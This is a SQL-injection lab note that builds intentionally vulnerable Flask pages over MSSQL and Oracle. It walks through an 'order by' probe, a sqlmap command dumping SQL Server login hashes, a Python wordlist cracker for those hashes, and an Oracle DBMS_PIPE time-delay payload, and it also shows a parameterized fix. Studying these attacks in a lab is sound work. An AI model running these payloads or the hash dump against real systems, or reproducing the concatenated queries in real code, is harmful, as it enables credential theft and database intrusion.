Link: https://github.com/dhgdhg/DVWA-Note
- Install MSSQL in Docker on Windows to build the test environment
  - https://www.cnblogs.com/edhg/p/11530901.html
- Write the MSSQL test page (deliberately injectable: the `id` parameter is concatenated straight into the query string)

```python
import pymssql
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def index():
    conn = pymssql.connect(host='127.0.0.1', user='sa', password='Pass@Word1', database='test')
    cursor = conn.cursor()
    my_id = request.args.get('id', '')
    # Intentionally vulnerable: user input is spliced into the SQL text, not bound as a parameter
    my_sql = "select * from test_t where id=" + my_id + " and name='name1'"
    result_txt = my_sql + '<br><br><br>'  # echo the executed query so payloads can be inspected
    try:
        cursor.execute(my_sql)
        row = cursor.fetchone()
        result_txt += "ID: {}<br>Name: {}".format(row[0], row[1])
    except Exception as e:
        result_txt += str(e)  # database errors are shown to the client (error-based injection)
    finally:
        cursor.close()
        conn.close()
    return result_txt


if __name__ == '__main__':
    app.run()
```
- Create the test table `test_t` and insert some rows
- Dump the login names and password hashes with sqlmap
- Capture the request with Burp Suite and save it as `rr.txt`
- Example (the `§` markers are Burp Intruder payload positions; sqlmap's own custom injection marker is `*`, but with `-r` it tests the `id` query parameter regardless):

```
GET /?id=§1%20order%20by%203--+§ HTTP/1.1
Host: 127.0.0.1:5000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
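What the `1 order by 3--+` probe above does against the test page's query, as an added example that is not part of the original notes: it rebuilds the same string concatenation over an in-memory sqlite3 table (a constructed stand-in for `test_t` with the two columns the page prints), walks `order by N` upward until the database errors to learn the column count, shows a `1 or 1=1--` payload returning every row, and puts the parameterized form beside it. sqlite3, the sample rows and the function names are assumptions for the offline demo; the SQL is the page's own.

```python
import sqlite3

# Constructed stand-in for the page's test_t table (id, name), matching the
# row[0]/row[1] the Flask page prints. sqlite3 replaces pymssql so this runs offline.
SAMPLE_ROWS = [(1, 'name1'), (2, 'name2'), (3, 'name1')]


def make_db():
    conn = sqlite3.connect(':memory:')
    conn.execute("create table test_t (id integer, name text)")
    conn.executemany("insert into test_t values (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_query(conn, my_id):
    """Same concatenation as the test page. Returns (sql, rows) or (sql, error text)."""
    my_sql = "select * from test_t where id=" + my_id + " and name='name1'"
    try:
        return my_sql, conn.execute(my_sql).fetchall()
    except sqlite3.Error as e:
        return my_sql, str(e)


def probe_column_count(conn, max_cols=10):
    """The 'order by N--' probe: the largest N that does not error is the column count.
    The trailing '-- ' comments out the page's own "and name='name1'" tail."""
    count = 0
    for n in range(1, max_cols + 1):
        _, result = vulnerable_query(conn, "1 order by %d-- " % n)
        if isinstance(result, str):  # database error: N exceeds the column count
            break
        count = n
    return count


def safe_query(conn, my_id):
    """Parameterized form: the value is bound, so payload text never becomes SQL.
    int() also rejects anything that is not a plain id before it reaches the driver."""
    try:
        return conn.execute("select * from test_t where id=? and name=?",
                            (int(my_id), 'name1')).fetchall()
    except ValueError:
        return []


if __name__ == '__main__':
    db = make_db()
    print("columns:", probe_column_count(db))
    print("vulnerable, 'or 1=1':", vulnerable_query(db, "1 or 1=1-- ")[1])
    print("parameterized, same payload:", safe_query(db, "1 or 1=1-- "))
```

The `order by` result (2 here) is what decides how many columns a later `union select` must supply; on MSSQL the error text comes back through the page's `str(e)`, which is the error-based channel sqlmap exploits.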
- Run sqlmap to dump the login names and password hashes (`fn_sqlvarbasetostr` renders the `varbinary` hash as a `0x...` hex string so it survives the trip through sqlmap's output):

```
sqlmap -r rr.txt --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"
```
- Crack the dumped hashes with johnny (the John the Ripper GUI) and a wordlist
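What the wordlist attack is actually computing, as an added example that is not part of the original notes: `password_hash` from `sys.sql_logins` is a 2-byte version tag, a 4-byte salt and a digest of `UTF-16LE(password) || salt` (`0x0100` + SHA-1 for SQL Server 2005-2008, John's `mssql05`; `0x0200` + SHA-512 for 2012 and later, John's `mssql12`). The code parses the `0x...` string sqlmap prints, recomputes the digest for each candidate and stops on a match. The sample hash is constructed here from the test page's `sa` password with a fixed salt; the function names are assumptions.

```python
import hashlib
import os

# Version tag -> (digest algorithm, digest length). SQL Server 2000 blobs also start
# with 0x0100 but carry two SHA-1 digests (40 bytes); they fail the length check below.
DIGESTS = {b'\x01\x00': ('sha1', 20), b'\x02\x00': ('sha512', 64)}


def mssql_hash(password, salt=None, version=b'\x02\x00'):
    """Build a password_hash blob the way SQL Server does (used here to make the sample)."""
    salt = salt if salt is not None else os.urandom(4)
    algo, _ = DIGESTS[version]
    digest = hashlib.new(algo, password.encode('utf-16-le') + salt).digest()
    return '0x' + (version + salt + digest).hex().upper()


def parse_hash(hash_str):
    """Split a 0x... string from fn_sqlvarbasetostr into (algorithm, salt, digest)."""
    hex_part = hash_str[2:] if hash_str.lower().startswith('0x') else hash_str
    blob = bytes.fromhex(hex_part)
    version, salt, digest = blob[:2], blob[2:6], blob[6:]
    if version not in DIGESTS:
        raise ValueError('unknown version tag %s' % version.hex())
    algo, length = DIGESTS[version]
    if len(digest) != length:
        raise ValueError('digest is %d bytes, expected %d for %s' % (len(digest), length, algo))
    return algo, salt, digest


def crack(hash_str, wordlist):
    """Dictionary attack, the same work johnny does: return the matching word or None."""
    algo, salt, digest = parse_hash(hash_str)
    for word in wordlist:
        if hashlib.new(algo, word.encode('utf-16-le') + salt).digest() == digest:
            return word
    return None


# Constructed sample: the test page's sa password, hashed as a 2012+ login with a fixed salt.
SAMPLE_HASH = mssql_hash('Pass@Word1', salt=bytes.fromhex('DEADBEEF'))
SAMPLE_WORDLIST = ['password', 'sa', 'admin', 'Pass@Word1', 'Password1']

if __name__ == '__main__':
    print(SAMPLE_HASH)
    print('cracked:', crack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

Because the salt is only four bytes and the digest is a single unkeyed hash, each candidate costs one SHA-512 (or SHA-1) over a few dozen bytes, which is why a plain wordlist is enough against weak `sa` passwords. The same blob, pasted into a file, is what johnny's `mssql12` or `mssql05` format expects.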
- Install Oracle in Docker on Windows to build the test environment
  - https://www.cnblogs.com/edhg/p/11531475.html
- Write the Oracle test page (same deliberate concatenation of `id`; `conn`/`cursor` are initialised before the `try` so the `finally` block no longer raises `NameError` when the connection itself fails)

```python
import cx_Oracle
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def index():
    my_id = request.args.get('id', '')  # 7369 is a valid EMPNO in the SCOTT sample schema
    # Intentionally vulnerable: user input is spliced into the SQL text, not bound as a parameter
    my_sql = "SELECT * FROM SCOTT.EMP WHERE EMPNO=" + my_id + " and ENAME='SMITH'"
    result_txt = my_sql + '<br><br><br>'  # echo the executed query so payloads can be inspected
    conn = cursor = None
    try:
        dsn = cx_Oracle.makedsn(host='127.0.0.1', port=1521, sid='helowin')
        conn = cx_Oracle.connect(user='system', password='passwd', dsn=dsn)
        cursor = conn.cursor()
        cursor.execute(my_sql)
        row = cursor.fetchone()
        result_txt += "ID: {}<br>Name: {}".format(row[0], row[1])
    except Exception as e:
        result_txt += str(e)  # database errors are shown to the client
    finally:
        if cursor is not None:
            cursor.close()
        if conn is not None:
            conn.close()
    return result_txt


if __name__ == '__main__':
    app.run()
```
- Time-based blind probe, appended to a valid id (for this page, `7369`):

```
and 1=(DBMS_PIPE.RECEIVE_MESSAGE(1, 10))
```

- Delays the response by 10 seconds: `RECEIVE_MESSAGE` waits up to 10 seconds for a message on a pipe nothing writes to and returns 1 when it times out, so the condition becomes true only after the wait. A response that takes roughly 10 seconds longer than the baseline confirms the injection even when the page shows no output or error.